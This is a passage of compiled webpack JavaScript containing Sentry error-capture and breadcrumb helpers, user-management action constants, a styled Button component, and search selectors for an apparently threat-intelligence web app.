            var wrappedArguments = args.map(function (arg) { return wrap(arg, options); });
            if (fn.handleEvent) {
                return fn.handleEvent.apply(this, wrappedArguments);
            }
            return fn.apply(this, wrappedArguments);
            // tslint:enable:no-unsafe-any
        }
        catch (ex) {
            ignoreNextOnError();
            Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["j" /* withScope */])(function (scope) {
                scope.addEventProcessor(function (event) {
                    var processedEvent = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, event);
                    if (options.mechanism) {
                        Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["d" /* addExceptionTypeValue */])(processedEvent, undefined, undefined, options.mechanism);
                    }
                    processedEvent.extra = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, processedEvent.extra, { arguments: Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["u" /* normalize */])(args, 3) });
                    return processedEvent;
                });
                Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["f" /* captureException */])(ex);
            });
            throw ex;
        }
    };
    // Accessing some objects may throw
    // ref: https://github.com/getsentry/sentry-javascript/issues/1168
    try {
        for (var property in fn) {
            if (Object.prototype.hasOwnProperty.call(fn, property)) {
                sentryWrapped[property] = fn[property];
            }
        }
    }
    catch (_oO) { } // tslint:disable-line:no-empty
    fn.prototype = fn.prototype || {};
    sentryWrapped.prototype = fn.prototype;
    Object.defineProperty(fn, '__sentry_wrapped__', {
        enumerable: false,
        value: sentryWrapped,
    });
    // Signal that this function has been wrapped/filled already
    // for both debugging and to prevent it to being wrapped/filled twice
    Object.defineProperties(sentryWrapped, {
        __sentry__: {
            enumerable: false,
            value: true,
        },
        __sentry_original__: {
            enumerable: false,
            value: fn,
        },
    });
    // Restore original function name (not all browsers allow that)
    try {
        var descriptor = Object.getOwnPropertyDescriptor(sentryWrapped, 'name');
        if (descriptor.configurable) {
            Object.defineProperty(sentryWrapped, 'name', {
                get: function () {
                    return fn.name;
                },
            });
        }
    }
    catch (_oO) {
        /*no-empty*/
    }
    return sentryWrapped;
}
var debounceTimer = 0;
/**
 * Wraps addEventListener to capture UI breadcrumbs
 * @param eventName the event name (e.g. "click")
 * @returns wrapped breadcrumb events handler
 * @hidden
 */
function breadcrumbEventHandler(eventName, debounce) {
    if (debounce === void 0) { debounce = false; }
    return function (event) {
        // reset keypress timeout; e.g. triggering a 'click' after
        // a 'keypress' will reset the keypress debounce so that a new
        // set of keypresses can be recorded
        keypressTimeout = undefined;
        // It's possible this handler might trigger multiple times for the same
        // event (e.g. event propagation through node ancestors). Ignore if we've
        // already captured the event.
        if (!event || lastCapturedEvent === event) {
            return;
        }
        lastCapturedEvent = event;
        var captureBreadcrumb = function () {
            // try/catch both:
            // - accessing event.target (see getsentry/raven-js#838, #768)
            // - `htmlTreeAsString` because it's complex, and just accessing the DOM incorrectly
            //   can throw an exception in some circumstances.
            var target;
            try {
                target = event.target ? _htmlTreeAsString(event.target) : _htmlTreeAsString(event);
            }
            catch (e) {
                target = '<unknown>';
            }
            if (target.length === 0) {
                return;
            }
            Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().addBreadcrumb({
                category: "ui." + eventName,
                message: target,
            }, {
                event: event,
                name: eventName,
            });
        };
        if (debounceTimer) {
            clearTimeout(debounceTimer);
        }
        if (debounce) {
            debounceTimer = setTimeout(captureBreadcrumb);
        }
        else {
            captureBreadcrumb();
        }
    };
}
/**
 * Wraps addEventListener to capture keypress UI events
 * @returns wrapped keypress events handler
 * @hidden
 */
function keypressEventHandler() {
    // TODO: if somehow user switches keypress target before
    //       debounce timeout is triggered, we will only capture
    //       a single breadcrumb from the FIRST target (acceptable?)
    return function (event) {
        var target;
        try {
            target = event.target;
        }
        catch (e) {
            // just accessing event properties can throw an exception in some rare circumstances
            // see: https://github.com/getsentry/raven-js/issues/838
            return;
        }
        var tagName = target && target.tagName;
        // only consider keypress events on actual input elements
        // this will disregard keypresses targeting body (e.g. tabbing
        // through elements, hotkeys, etc)
        if (!tagName || (tagName !== 'INPUT' && tagName !== 'TEXTAREA' && !target.isContentEditable)) {
            return;
        }
        // record first keypress in a series, but ignore subsequent
        // keypresses until debounce clears
        if (!keypressTimeout) {
            breadcrumbEventHandler('input')(event);
        }
        clearTimeout(keypressTimeout);
        keypressTimeout = setTimeout(function () {
            keypressTimeout = undefined;
        }, debounceDuration);
    };
}
/**
 * Given a child DOM element, returns a query-selector statement describing that
 * and its ancestors
 * e.g. [HTMLElement] => body > div > input#foo.btn[name=baz]
 * @returns generated DOM path
 */
function _htmlTreeAsString(elem) {
    var currentElem = elem;
    var MAX_TRAVERSE_HEIGHT = 5;
    var MAX_OUTPUT_LEN = 80;
    var out = [];
    var height = 0;
    var len = 0;
    var separator = ' > ';
    var sepLength = separator.length;
    var nextStr;
    while (currentElem && height++ < MAX_TRAVERSE_HEIGHT) {
        nextStr = _htmlElementAsString(currentElem);
        // bail out if
        // - nextStr is the 'html' element
        // - the length of the string that would be created exceeds MAX_OUTPUT_LEN
        //   (ignore this limit if we are on the first iteration)
        if (nextStr === 'html' || (height > 1 && len + out.length * sepLength + nextStr.length >= MAX_OUTPUT_LEN)) {
            break;
        }
        out.push(nextStr);
        len += nextStr.length;
        currentElem = currentElem.parentNode;
    }
    return out.reverse().join(separator);
}
/**
 * Returns a simple, query-selector representation of a DOM element
 * e.g. [HTMLElement] => input#foo.btn[name=baz]
 * @returns generated DOM path
 */
function _htmlElementAsString(elem) {
    var out = [];
    var className;
    var classes;
    var key;
    var attr;
    var i;
    if (!elem || !elem.tagName) {
        return '';
    }
    out.push(elem.tagName.toLowerCase());
    if (elem.id) {
        out.push("#" + elem.id);
    }
    className = elem.className;
    if (className && Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["q" /* isString */])(className)) {
        classes = className.split(/\s+/);
        for (i = 0; i < classes.length; i++) {
            out.push("." + classes[i]);
        }
    }
    var attrWhitelist = ['type', 'name', 'title', 'alt'];
    for (i = 0; i < attrWhitelist.length; i++) {
        key = attrWhitelist[i];
        attr = elem.getAttribute(key);
        if (attr) {
            out.push("[" + key + "=\"" + attr + "\"]");
        }
    }
    return out.join('');
}
//# sourceMappingURL=helpers.js.map

/***/ }),
/* 517 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_USER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return FETCH_USER_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return FETCH_USER_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return DELETE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DEACTIVATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return DEACTIVATE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DEACTIVATE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return RESET_PASSWORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return RESET_PASSWORD_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return RESET_PASSWORD_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return EXPORT_ALL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return EXPORT_ALL_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return SET_DISPLAY_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return AUTOSUGGEST; });
var prefix = function prefix(str) {
  return 'station/users/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_USER = prefix('FETCH_USER');
var FETCH_USER_SUCCESS = prefix('FETCH_USER_SUCCESS');
var FETCH_USER_FAILURE = prefix('FETCH_USER_FAILURE');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

var DEACTIVATE = prefix('DEACTIVATE');
var DEACTIVATE_SUCCESS = prefix('DEACTIVATE_SUCCESS');
var DEACTIVATE_FAILURE = prefix('DEACTIVATE_FAILURE');

var RESET_PASSWORD = prefix('RESET_PASSWORD');
var RESET_PASSWORD_SUCCESS = prefix('RESET_PASSWORD_SUCCESS');
var RESET_PASSWORD_FAILURE = prefix('RESET_PASSWORD_FAILURE');

var EXPORT_ALL = prefix('EXPORT_ALL');
var EXPORT_ALL_FAILURE = prefix('EXPORT_ALL_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

var AUTOSUGGEST = prefix('AUTOSUGGEST');

/***/ }),
/* 518 */,
/* 519 */,
/* 520 */,
/* 521 */,
/* 522 */,
/* 523 */,
/* 524 */,
/* 525 */,
/* 526 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__themes_common__ = __webpack_require__(212);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_polished__ = __webpack_require__(874);




/**
 * Default Button Style is
 * Large button, Filled, Primary Color, Not Stretched, Not Disabled
 */
var ButtonBaseStyle = '\n  display: inline-block;\n  border-radius: 1rem;\n  cursor: pointer;\n  user-select: none;\n\n  &:disabled {\n    pointer-events: none;\n    opacity: .6;\n  }\n';

var LargeButtonStyle = '\n  padding: 1.25rem;\n  font-size: 1.25rem;\n  border: 2px solid transparent;\n  \n';

var MediumButtonStyle = '\n  padding: 0.75rem 1.25rem;\n  font-size: 1.167rem;\n  border: 1px solid transparent;\n';

var SmallButtonStyle = '\n  padding: 0.5rem 1rem;\n  font-size: 1rem;\n  border: 1px solid transparent;\n';

var OutlineStyle = function OutlineStyle(_ref) {
  var _ref$buttonType = _ref.buttonType,
      buttonType = _ref$buttonType === undefined ? 'primary' : _ref$buttonType,
      theme = _ref.theme;

  var color = Object(__WEBPACK_IMPORTED_MODULE_1__themes_common__["getButtonColorWithTheme"])(buttonType, theme);

  var hoverShade = Object(__WEBPACK_IMPORTED_MODULE_1__themes_common__["inDarkMode"])(theme) ? Object(__WEBPACK_IMPORTED_MODULE_2_polished__["c" /* lighten */])(0.1, color.hex) : Object(__WEBPACK_IMPORTED_MODULE_2_polished__["c" /* lighten */])(0.5, color.hex);
  var textColor = Object(__WEBPACK_IMPORTED_MODULE_1__themes_common__["inDarkMode"])(theme) ? theme.ThemeColors.TEXT : color;

  return '\n    background: transparent;\n    color: ' + textColor.hex + ';\n    outline: transparent;\n    border-color: ' + color.hex + ';\n\n    &:active {\n      background-color: transparent;\n    }\n    &:hover {\n      background-color: ' + hoverShade + ';\n    }\n  ';
};

var NoFillStyle = function NoFillStyle(_ref2) {
  var _ref2$buttonType = _ref2.buttonType,
      buttonType = _ref2$buttonType === undefined ? 'primary' : _ref2$buttonType,
      theme = _ref2.theme,
      glowHover = _ref2.glowHover;

  var textColor = theme.ThemeColors.TEXT;
  var color = Object(__WEBPACK_IMPORTED_MODULE_1__themes_common__["inDarkMode"])(theme) ? theme.ThemeColors.DARK : theme.ThemeColors.LIGHT;
  // FIXME buttonText is real, buttonColor is not
  var glowHoverSettings = '\n      color: ' + textColor.hover() + ';\n      text-shadow: 0 0 ' + (__WEBPACK_IMPORTED_MODULE_1__themes_common__["inDarkMode"] ? '1.5px' : '1px') + ' ' + textColor.hover() + ';\n  ';

  var hoverSettings = '\n      border-color: transparent;\n      background-color: ' + color.hex + ';\n      color: ' + color.buttonColor + ';\n  ';

  var activeSettings = '\n      border-color: transparent;\n      background-color: ' + color.X900 + ';\n      color: ' + color.buttonColor + ';\n  ';

  return '\n    border-color: transparent;\n    background: transparent;  \n    color: ' + textColor.hex + ';\n\n    &:active {\n      ' + activeSettings + '\n    }\n    &:hover {\n      ' + (glowHover ? glowHoverSettings : hoverSettings) + '\n  ';
};

var ColorStyle = function ColorStyle(_ref3) {
  var _ref3$buttonType = _ref3.buttonType,
      buttonType = _ref3$buttonType === undefined ? 'primary' : _ref3$buttonType,
      theme = _ref3.theme,
      active = _ref3.active;

  var color = Object(__WEBPACK_IMPORTED_MODULE_1__themes_common__["getButtonColorWithTheme"])(buttonType, theme);

  if (!Object(__WEBPACK_IMPORTED_MODULE_1__themes_common__["inDarkMode"])(theme) && buttonType === 'tertiary') {
    return OutlineStyle({ buttonType: 'primary', theme: theme, active: active });
  }

  var activeSettings = '\n      background-color: ' + color.X600 + ';\n      border-color: ' + color.X600 + ';\n  ';

  var hoverSettings = '\n    &:hover {\n      background-color: ' + color.X600 + ';\n      border-color: ' + color.X600 + ';\n    }\n  ';

  return '\n    color: ' + color.buttonText + ';\n    background-color: ' + color.hex + ';\n    border-color: ' + color.hex + ';\n    \n    ' + (active ? activeSettings : '') + '\n    \n    &:active {\n      background-color: ' + color.X900 + ';\n      border-color: ' + color.X900 + ';\n    }\n    ' + (!active ? hoverSettings : '') + '\n\n  ';
};

var DisabledStyle = '\n  opacity: .8;\n';

var stretchStyle = '\n  width: 100%;\n  justify-content: center;\n';

var TransparentStyle = '\n  background: transparent;\n  border-color: transparent;\n  &:hover {\n    background: transparent;\n    border-color: transparent;\n  }\n';

/**
 * Ok this button has a lot of dynamic style props:
 * - strictStyle: Adds && to the definition to make the styling rules stronger, default: TRUE
 * - ColorStyle: Takes the current theme and looks up the color corresponding with buttonType, default: PRIMARY
 * - size: Self explanatory, applies font-size, padding, dimensions based on param, default: MEDIUM
 * - disabled: Self-explanatory, default: FALSE
 * - stretched: Applies width 100% to the button, default: FALSE
 * - fill: Whether the button should be normal fill, outline only, or no fill, default: undefined aka fill
 * - transparent: Sometimes we need to have a button, to function as a button, but to be transparent. Shruggie. default: FALSE
 */

var Button = __WEBPACK_IMPORTED_MODULE_0_styled_components__["c" /* default */].button.attrs({
  'aria-label': 'Button',
  'data-cy': function dataCy(props) {
    return props.cyid || 'button';
  } // cyid is cypressid which translates into a data-cy prop for e2e testing
}).withConfig({
  displayName: 'BaseButton__Button',
  componentId: 'sc-122emhw-0'
})(['', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ''], function (_ref4) {
  var strictStyle = _ref4.strictStyle;
  return strictStyle === false ? '' : '&& {';
}, ButtonBaseStyle, function (_ref5) {
  var size = _ref5.size;
  return size === 'large' ? LargeButtonStyle : size === 'small' ? SmallButtonStyle : MediumButtonStyle;
}, ColorStyle, function (_ref6) {
  var disabled = _ref6.disabled;
  return disabled ? DisabledStyle : '';
}, function (_ref7) {
  var stretched = _ref7.stretched;
  return stretched ? stretchStyle : '';
}, function (_ref8) {
  var fill = _ref8.fill;
  return fill === 'outline' ? OutlineStyle : fill === 'none' ? NoFillStyle : '';
}, function (_ref9) {
  var transparent = _ref9.transparent;
  return transparent ? TransparentStyle : '';
}, function (_ref10) {
  var strictStyle = _ref10.strictStyle;
  return strictStyle === false ? '' : '}';
});

/* harmony default export */ __webpack_exports__["a"] = (Button);

/***/ }),
/* 527 */,
/* 528 */,
/* 529 */,
/* 530 */,
/* 531 */,
/* 532 */,
/* 533 */,
/* 534 */,
/* 535 */,
/* 536 */,
/* 537 */,
/* 538 */,
/* 539 */,
/* 540 */,
/* 541 */,
/* 542 */,
/* 543 */,
/* 544 */,
/* 545 */,
/* 546 */,
/* 547 */,
/* 548 */,
/* 549 */,
/* 550 */,
/* 551 */,
/* 552 */,
/* 553 */,
/* 554 */,
/* 555 */,
/* 556 */,
/* 557 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchTerm", function() { return searchTerm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "viewPanel", function() { return viewPanel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchOptions", function() { return searchOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "iocsResponse", function() { return iocsResponse; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportsResponse", function() { return reportsResponse; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "selectedSort", function() { return selectedSort; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultValues", function() { return defaultValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "iocsData", function() { return iocsData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchLoading", function() { return searchLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "noSearchResults", function() { return noSearchResults; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportsWithMetadata", function() { return reportsWithMetadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchResultsCount", function() { return searchResultsCount; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchResults", function() { return searchResults; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentViewPanel", function() { return currentViewPanel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportPageQueryRaw", function() { return reportPageQueryRaw; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "queryResults", function() { return queryResults; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportsLoadingAllData", function() { return reportsLoadingAllData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportPageQuery", function() { return reportPageQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportResultsWithMeta", function() { return reportResultsWithMeta; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entityPageQueryRaw", function() { return entityPageQueryRaw; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entitiesLoadingAllData", function() { return entitiesLoadingAllData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entityPageQuery", function() { return entityPageQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entityResultsWithMeta", function() { return entityResultsWithMeta; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchPageQuery", function() { return searchPageQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchPayloadHasBeenInitialized", function() { return searchPayloadHasBeenInitialized; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allSearchResultsWithMeta", function() { return allSearchResultsWithMeta; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultFilters", function() { return defaultFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultSorterValues", function() { return defaultSorterValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entityTypeOptions", function() { return entityTypeOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportSortOptions", function() { return reportSortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entitySortOptions", function() { return entitySortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultReportsSearchPayload", function() { return defaultReportsSearchPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultEntitiesSearchPayload", function() { return defaultEntitiesSearchPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultReportResult", function() { return defaultReportResult; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultEntityResult", function() { return defaultEntityResult; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultSearchResults", function() { return defaultSearchResults; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__ = __webpack_require__(217);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_reports_getters__ = __webpack_require__(215);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_indicators_getters__ = __webpack_require__(300);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__tags_getters__ = __webpack_require__(1415);










var searchTerm = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'query']);
var viewPanel = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'panel']);
var searchOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'options']);
var iocsResponse = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'iocs']);
var reportsResponse = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'reports']);

var iocsLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'iocs', 'loading']);
var reportsLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'reports', 'loading']);

/* Search 2.0 */
var selectedSort = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'selectedSort']);
var defaultValues = {
  searchSorterPlaceholder: 'Select',
  searchSorterSearch: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    text: 'Newest to Oldest Submitted',
    sort: {
      field: 'created',
      order: 'desc' // asc / desc
    }
  })
};

/* END Search 2.0 */

var iocsData = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([iocsResponse], function (iocsResponse) {
  return iocsResponse ? iocsResponse.get('data') : Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])();
});

var searchLoading = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([iocsLoading, reportsLoading], function (iocsLoading, reportsLoading) {
  return iocsLoading && reportsLoading;
});

/* Determine if search returned zero results. If either query is still loading, return false */
var noSearchResults = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([iocsResponse, reportsResponse], function (iocs, reports) {
  if (iocs.get('loading') || reports.get('loading')) return false;
  if (iocs.get('totalPageElements') === 0 && reports.get('totalPageElements') === 0) {
    return true;
  }
  return false;
});

/* Merge reports search results with reports metadata */
var reportsWithMetadata = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reportsResponse, __WEBPACK_IMPORTED_MODULE_5_modules_reports_getters__["metadataCache"], __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (reports, metadata, enclaves) {
  return reports.update('data', function (d) {
    return d.map(function (r) {
      var meta = metadata.get(r.get('id'), Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
      return r.merge(meta) // Merge metadata with data, but give data precedence
      .update('enclaves', function (e) {
        return e.map(function (enclave) {
          return enclaves.get(enclave.get('id'));
        });
      });
    });
  });
});

/* Total result tallies for search query */
var searchResultsCount = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([iocsResponse], function (iocs) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    iocs: iocs.get('totalPageElements'),
    reports: 0
  });
});

var IOCS_PREVIEW_LIMIT = 3;
var REPORTS_PREVIEW_LIMIT = 3;

/* Derive search results for presentation, filtered by view panel selection,
 * panel = ALL | IOCS | REPORTS
 */
var searchResults = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([iocsResponse, reportsWithMetadata, viewPanel], function (iocs, reports, panel) {

  var iocsResult = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    data: iocs,
    title: 'IOCs',
    category: 'iocs'
  });
  var reportsResult = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    data: reports,
    title: 'Incident Reports',
    category: 'incidentReports'
  });

  var iocsPreview = iocsResult.set('data', iocs.update('data', function (d) {
    return d.take(IOCS_PREVIEW_LIMIT);
  }));

  var reportsPreview = reportsResult.set('data', reports.update('data', function (d) {
    return d.take(REPORTS_PREVIEW_LIMIT);
  }));

  switch (panel) {
    case 'ALL':
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
        iocs: iocsPreview,
        incidentReports: reportsPreview
      });
    case 'IOCS':
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
        iocs: iocsResult
      });
    case 'REPORTS':
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
        incidentReports: reportsResult
      });
    default:
      console.warn('viewPanel for search results is an unexpected value: ' + panel);
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])();
  }
});

// When on pages that apply tags to both reports and entities at the same time, we must make sure only the relevant
// tags are selected for each category
var removeNonReportTags = function removeNonReportTags(payload, store) {
  var currentState = store.getState();
  var entityTags = Object(__WEBPACK_IMPORTED_MODULE_7__tags_getters__["allTagOptionsEntities"])(currentState);
  var reportTagsInSearchPayload = payload.get('tagFilters');
  var onlyReportTags = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    included: reportTagsInSearchPayload.get('included').subtract(entityTags.included),
    excluded: reportTagsInSearchPayload.get('excluded').subtract(entityTags.excluded)
  });

  return payload.set('tagFilters', onlyReportTags);
};
var removeNonEntityTags = function removeNonEntityTags(payload, store) {
  var currentState = store.getState();
  var reportTags = Object(__WEBPACK_IMPORTED_MODULE_7__tags_getters__["allTagOptionsReports"])(currentState);
  var entityTagsInSearchPayload = payload.get('tagFilters');
  var onlyEntityTags = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    included: entityTagsInSearchPayload.get('included').subtract(reportTags.included),
    excluded: entityTagsInSearchPayload.get('excluded').subtract(reportTags.excluded)
  });

  return payload.set('tagFilters', onlyEntityTags);
};

// Search 2.0
var currentViewPanel = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'currentViewPanel']);

var reportPageQueryRaw = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'reportPageQueryRaw']);
var queryResults = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'searchResults']);
var reportsLoadingAllData = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'reportsLoadingAllData']);

/* Reports without irrelevant tags */
var reportPageQuery = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reportPageQueryRaw, __WEBPACK_IMPORTED_MODULE_7__tags_getters__["allTagOptionsEntities"]], function (reportQueryObject, allEntityTags) {
  var reportTagsInSearchPayload = reportQueryObject.get('tagFilters');
  var onlyReportTags = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    included: reportTagsInSearchPayload.get('included').subtract(allEntityTags.included),
    excluded: reportTagsInSearchPayload.get('excluded').subtract(allEntityTags.excluded)
  });
  return reportQueryObject.set('tagFilters', onlyReportTags);
});

/* Merge reports search results with reports metadata */
var reportResultsWithMeta = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([queryResults, __WEBPACK_IMPORTED_MODULE_5_modules_reports_getters__["metadataCache"], __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (queryResults, metadata, enclaves) {
  return queryResults.get('reports').update('items', function (report) {
    return report.map(function (r) {
      var meta = metadata.get(r.get('guid'), Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
      var reportEnclave = enclaves.get(r.get('enclaveGuid'));
      return r.merge(meta) // Merge metadata with data, but give data precedence
      .set('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])([reportEnclave])).update('enclaves', function (enclaves) {
        return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])(enclaves);
      }).set('title', r.get('title')); // Reset title to ensure metadata doesn't override potentially new title
    });
  });
});

